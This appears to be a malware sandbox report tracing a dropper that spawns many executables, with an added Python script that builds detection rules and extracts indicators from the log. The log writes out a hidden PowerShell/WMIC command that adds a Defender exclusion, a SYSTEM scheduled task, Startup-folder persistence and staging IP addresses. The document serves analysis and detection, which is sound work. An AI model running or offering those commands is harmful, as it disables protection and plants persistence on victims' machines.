Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: 185.172.128.228  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: 185.172.128.59  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /syncUpd.exe  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /1/Qg_Appv5.exe  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: Qg_Appv5.exe  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /BroomSetup.exe  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: @  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: one  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: two  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: five  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: seven  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: eight  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: nine  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: ten  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: 185.172.128.90  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: Installed  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: 185.172.128.228  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: 185.172.128.59  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /syncUpd.exe  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /1/Qg_Appv5.exe  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: Qg_Appv5.exe  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /BroomSetup.exe  21_2_041E4DA5
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe  Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe  Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: file.exe  Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe  Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1374404248.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.0000000140001000.00000040.00000001.01000000.00000015.sdmp  Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1374404248.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.0000000140001000.00000040.00000001.01000000.00000015.sdmp  Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1405006585.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000003.1545346922.000000002471E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe  ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\file.exe  File read: C:\Users\user\Desktop\file.exe
Source: unknown  Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe"
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe"
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Process created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe "C:\Users\user\AppData\Local\Temp\u5v8.0.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe"
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe  Process created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe .\Install.exe /nxdidQZJ "385118" /S
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe  Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exe  Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe "C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe"
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Process created: C:\Users\user\AppData\Local\Temp\u69w.0.exe "C:\Users\user\AppData\Local\Temp\u69w.0.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe "C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe"
Source: unknown  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" "
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Process created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
Source: C:\Windows\System32\cmd.exe  Process created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
Source: C:\Windows\SysWOW64\schtasks.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe"
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Process created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe "C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe"
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Process created: C:\Users\user\AppData\Local\Temp\u69w.1.exe "C:\Users\user\AppData\Local\Temp\u69w.1.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe"
Source: unknown  Process created: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe em /VNsite_idnLd 385118 /S
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe  Process created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe  Process created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
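The process-creation records above carry the chain a detection engineer would want to catch from this report: the .NET host AddInProcess32.exe (the process the sample hollows) spawning droppers from the user's Pictures folder; a forfiles.exe /c proxy that runs cmd, then powershell, then WMIC to add an ".exe" extension exclusion to Defender via the MSFT_MpPreference class; a scheduled task created with /RU "SYSTEM" whose action lives under %TEMP%; and a .bat launched from the per-user Startup folder. The Python below is an added example, not Joe Sandbox code and not the malware's: it parses a constructed sample of the report's own lines (the Source column and the signature separated by two spaces, the "Jump to behavior" link text removed; the parser also accepts the unseparated form), rebuilds the parent chain by image path, runs those rules, and pulls the staging IPs and .exe paths out of the "Command line argument" records of t7IXQJi6R3tWUMJ8f9cQzMWm.exe. The Proc class, the rule names and the helper functions are this example's own.

```python
"""Detection logic over process-creation and command-line-argument lines
from the sandbox report above. Added example; not Joe Sandbox or malware code."""
import re
from dataclasses import dataclass

# Constructed sample: copies of the report's own lines, Source and signature
# separated by two spaces, "Jump to behavior" removed. PROC_RE also accepts
# the unseparated form ("...file.exeProcess created: ...").
REPORT = r"""
Source: unknown  Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe"
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe  Process created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe .\Install.exe /nxdidQZJ "385118" /S
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe  Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe  Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
Source: unknown  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" "
Source: C:\Windows\System32\cmd.exe  Process created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: 185.172.128.228  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /BroomSetup.exe  21_2_00424B3E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: 185.172.128.59  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: /syncUpd.exe  21_2_041E4DA5
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Command line argument: one  21_2_041E4DA5
"""

PROC_RE = re.compile(r"^Source:\s*(?P<parent>.+?)\s*Process created:\s*(?P<image>\S+)\s*(?P<cmdline>.*)$")
ARG_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*Command line argument:\s*(?P<arg>\S+)\s+(?P<func>\d+_\d+_[0-9A-Fa-f]+)\s*$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class Proc:
    parent: str   # image path of the creating process, or "unknown"
    image: str    # image path of the created process
    cmdline: str  # command line as logged

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_report(text: str) -> list[Proc]:
    """Turn 'Process created' records into Proc objects; other lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = PROC_RE.match(line.replace("Jump to behavior", "").strip())
        if m:
            procs.append(Proc(m["parent"], m["image"], m["cmdline"].strip()))
    return procs


def ancestry(procs: list[Proc], image: str) -> list[str]:
    """Image paths from the tree root down to `image`. The report keys parents
    by image path, so that is the join key; 'unknown' (or a cycle) ends the walk."""
    by_image = {p.image: p for p in procs}
    chain, seen = [image], {image}
    while image in by_image:
        parent = by_image[image].parent
        if parent == "unknown" or parent in seen:
            break
        chain.append(parent)
        seen.add(parent)
        image = parent
    return chain[::-1]


# One predicate per rule, evaluated on each record. Names are this example's own.
RULES = {
    # Defender exclusion added through the WMI MSFT_MpPreference class (fires on every hop carrying it).
    "defender_exclusion": lambda p: "msft_mppreference" in p.cmdline.lower()
                                     and "exclusion" in p.cmdline.lower(),
    # forfiles.exe /c runs an arbitrary command once per matched file: proxy execution.
    "forfiles_proxy_exec": lambda p: p.name == "forfiles.exe" and "/c" in p.cmdline.lower(),
    # Task created to run as SYSTEM whose action lives under %TEMP%.
    "system_task_from_temp": lambda p: p.name == "schtasks.exe" and "/create" in p.cmdline.lower()
                                       and re.search(r'/ru\s+"?system"?', p.cmdline.lower()) is not None
                                       and "\\appdata\\local\\temp\\" in p.cmdline.lower(),
    # Batch file launched from the per-user Startup folder.
    "startup_folder_batch": lambda p: "\\start menu\\programs\\startup\\" in p.cmdline.lower()
                                      and ".bat" in p.cmdline.lower(),
    # The .NET AddInProcess32.exe host (hollowed here) spawning binaries out of the user profile.
    "dotnet_host_spawns_user_exe": lambda p: p.parent.lower().endswith("\\addinprocess32.exe")
                                             and p.image.lower().startswith("c:\\users\\"),
}


def detect(procs: list[Proc]) -> dict[str, list[str]]:
    """Map each rule name to the basenames of the records it fires on, in report order."""
    return {name: [p.name for p in procs if rule(p)] for name, rule in RULES.items()}


def staging_iocs(text: str) -> tuple[list[str], list[str]]:
    """IPv4 addresses and .exe paths seen in 'Command line argument' records."""
    ips, paths = set(), set()
    for line in text.splitlines():
        m = ARG_RE.match(line.strip())
        if not m:
            continue
        arg = m["arg"]
        if IPV4_RE.match(arg):
            ips.add(arg)
        elif arg.lower().endswith(".exe"):
            paths.add(arg)
    return sorted(ips), sorted(paths)


if __name__ == "__main__":
    procs = parse_report(REPORT)
    for rule, names in detect(procs).items():
        print(f"{rule}: {names}")
    wmic = next(p.image for p in procs if p.name == "wmic.exe")
    print(" -> ".join(p.rsplit("\\", 1)[-1] for p in ancestry(procs, wmic)))
    print(staging_iocs(REPORT))
```

The report does not state which IP each path was fetched from, so staging_iocs returns the two lists separately rather than pairing them. The same rules map directly onto Sysmon event 1 or Windows 4688 fields (ParentImage, Image, CommandLine) if you want to run them against endpoint telemetry instead of a sandbox export.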
Source: C:\Users\user\Desktop\file.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Process created: unknown unknown
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Process created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe "C:\Users\user\AppData\Local\Temp\u5v8.0.exe"
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Process created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Process created: unknown unknown
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe  Process created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe  Process created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe  Process created: unknown unknown
